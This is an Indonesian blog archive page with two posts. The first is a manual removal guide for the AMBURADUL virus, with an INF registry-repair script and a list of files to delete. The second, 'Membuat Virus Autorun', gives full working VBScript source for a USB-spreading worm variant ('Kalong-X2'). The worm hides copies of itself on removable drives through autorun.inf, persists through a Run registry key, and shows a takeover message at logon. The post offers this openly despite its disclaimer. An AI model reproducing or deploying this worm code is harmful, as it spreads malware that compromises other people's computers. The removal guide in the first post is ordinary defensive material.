13 | April | 2010 | Abbysatria's Blog

Archive for April 13, 2010

Remove virus AMBURADUL (all varian)

Filed under: Script Virus — Tinggalkan komentar

April 13, 2010

Menghapus virus AMBURADUL (semua varian)

Mereka tidak pernah berhenti menyebarkan pengetahuan mereka …. dan kami juga tidak pernah membiarkan mereka hidup selamanya. Ini adalah artikel bagaimana menghapus virus amburadul untuk semua varian tidak perlu untuk program antivirus Anda hanya dapat membersihkan dengan menggunakan teknik manual.

Cara sederhana untuk mengetahui apakah komputer Anda terinfeksi oleh virus ini adalah Anda akan melihat file JPEG dengan ekstensi aplikasi. Sekarang mari kita mulai untuk menghapusnya!

1. Cabut komputer Anda terinfeksi dari jaringan Anda untuk menghentikan penyebaran virus ini.
2. Nonaktifkan “System Restore” ketika dalam proses pembersihan.
3. Membunuh proses virus menggunakan perkakas listrik “currprocess” membunuh semua proses dengan ikon JPG.
4. Perbaikan registry yang sudah diubah oleh virus menggunakan kode ini:

[Version]
Signature=”$Chicago$”
Provider=Nobody

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”””%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, UncheckedValue,0×00010001,0
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt,CheckedValue,0×00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt,DefaultValue,0×00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, UncheckedValue,0×00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, CheckedValue,0×00010001,0
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, DefaultValue,0×00010001,0
HKCU, Software\Microsoft\Internet Explorer\Main, Start Page,0, “about:blank”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, type,0, “checkbox”
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, type,0, “checkbox”
HKCU, Control Panel\International, s1159,0, “AM”
HKCU, Control Panel\International, s2359,0, “PM”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden,0×00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, SuperHidden,0×00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, HideFileExt,0×00010001,0

[del]
HKCU, Software\Microsoft\Internet Explorer\Main, Window Title,
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore, DisableConfig
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore, DisableSR
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kspoold.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kspool.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HokageFile.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rin.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Obito.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KakashiHatake.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears-CLN.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears-RTP.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HOKAGE4.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansav.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Setup.exe,debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Instal.exe, debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Install.exe,debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansavgd.exe
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, DisableMSI
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, LimitSystemRestoreCheckpointing
HKCR, exefile, NeverShowExt
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, PaRaY_VM
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, ConfigVir
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, NviDiaGT
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, NarmonVirusAnti
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, AVManager
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, EnableLUA

5. Hapus virus master dalam% systemroot% \ system32 \ ~ A ~ m ~ B ~ u ~ R ~ a ~ D ~ u ~ L ~ sebelum Anda melakukan ini, Anda harus membuat file hiden menjadi terlihat.
Kemudian dihapus ini daftar file:

csrcc.exe
smss.exe
lsass.exe
services.exe
winlogon.exe
Paraysutki_VM_Community.sys
msvbvm60.dll
Drive:\Autorun.inf
Drive:\FoToKu xx-x-*.exe, where x show the date when virus active
Drive:\Friendster Community.exe
Drive:\J3MbataN K4HaYan.exe
Drive:\MyImages.exe
Drive:\PaLMa.exe
Drive:\Images

Untuk memastikan komputer Anda bersih Anda dapat memeriksa memindai komputer Anda menggunakan program antivirus favorit Anda.
Selesai, have a nice day

sumberr : remove-virus-amburadul-all-varian.html

Komentar

Membuat Virus Autorun

Filed under: Script Virus — Tinggalkan komentar

Saya bimbang nih sama artikel ini,
saya publikasikan atau tidak !!!
Karena sama saja Saya mengajarkan kepada kalian kejahatan
Setelah dipikir matang-matang ya sudah akhirnya saya publikasikan juga artikel ini dengan pertimbangan tujuan penulisan ini Cuma untuk ilmu pengetahuan. Ingat penulis tidak bertanggung jawab atas kejahatan yang kalian timbulkan.

Adapun cara membuat virus autorun sebagai berikut

1. Script coding pertama
[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda
petik)

2. Script coding kedua
‘Kalong-X2
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim
rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd

Siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

Buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39

Sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\k4l0n6.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

Manipulasi Registry
set kalong = createobject(“WScript.Shell”)

Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Window Title”,”:: X2 ATTACK ::”

Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explo
rer\RunMRU\a”, “KALONG-X2/1”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunM\MRUList”,”a”

Buat pesan saat Windows Startup
kalong.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Win
logon\LegalNoticeCaption”, “KALONG-X2”
kalong.RegWrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”

Aktifkan saat Windows Startup
kalong.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”,syspath & “\recycle.vbs”

Ubah Default Start Page Internet Explorer
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Start Page”, “http://www.vaksin.com”

Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
Simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa
tanda petik)
secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi
komputer yang kita gunakan. sekali lagi Saya mohon agar jangan disebarluaskan ya virus ini!!!